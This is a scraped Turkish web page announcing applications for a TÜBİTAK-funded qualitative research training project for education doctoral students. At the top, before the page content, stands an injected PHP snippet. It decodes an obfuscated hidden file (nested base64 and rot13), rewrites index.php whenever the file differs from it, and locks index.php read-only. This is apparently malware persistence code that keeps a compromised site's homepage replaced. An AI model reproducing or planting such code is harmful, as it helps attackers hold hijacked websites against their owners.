$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Proje Başvurusu | Ntay 4

Proje Başvurusu

TÜBİTAK 4005 Bilim ve Toplum Projeleri Destekleme Programı kapsamında desteklenen “Alan
Uzmanlarıyla Nitel Temelli Araştırmalara Yolculuk IV” projesi; eğitim bilimleri alanında doktora
yapan ve tezlerinde/çalışmalarında nitel temelli araştırma desenlerini kullanmayı planlayan 30
doktora öğrencisi ile gerçekleştirilecektir. Projeye katılacak olan katılımcıların doktora yeterlik
sınavında başarılı olması, tez önerisinin kabul edilmesi ve kabul edilen bu önerinin yönteminin
nitel temelli olması veya nitel temelli araştırmaya yönelik çalışma yapmış olması şartlarını
sağlaması gerekmektedir.

Proje kapsamında örnek olay yöntemiyle verilecek olan NTA eğitimlerinin uygulamalı ve grup
çalışması şeklinde planlanması nedeniyle 30 kişilik bir katılımcı grubu hedeflenmiştir.
Katılımcıların belirlenmesinde Bursa ili ve çevresi başta olmak üzere Türkiye’nin diğer illerinden
gerçekleştirilecek başvurular da dikkate alınacaktır.

Etkinliğin web sitesi üzerinden yapılacak başvurularda seçim, adayların başvuru ve tez önerisi
formunda verdikleri bilgilere göre gerçekleştirilecektir. Katılımcıların konaklama (3 kişilik odalarda)
ve yemek masrafları TÜBİTAK tarafından karşılanacaktır. Eğitimlerin uygulamalı olarak
gerçekleştirilecek olması nedeniyle katılımcıların projeye bilgisayarları ile birlikte katılmaları
gerekmektedir.

Başvuracak değerli katılımcıların aşağıdaki şartları sağlaması beklenmektedir:
• Eğitim bilimleri alanında doktora yapıyor olmak,
• Doktora tezlerinde nitel temelli araştırma desenlerini kullanıyor olmak veya nitel temelli
araştırmaların kullanıldığı bilimsel makaleler yapmak

Başvurmak için lütfen başvuru ve tez önerisi/makale formunu indirip doldurunuz ve
Başvurmak için lütfen başvuru ve tez önerisi/makale formunu indirip doldurunuz ve
ntay4005@gmail.com adresine gönderiniz.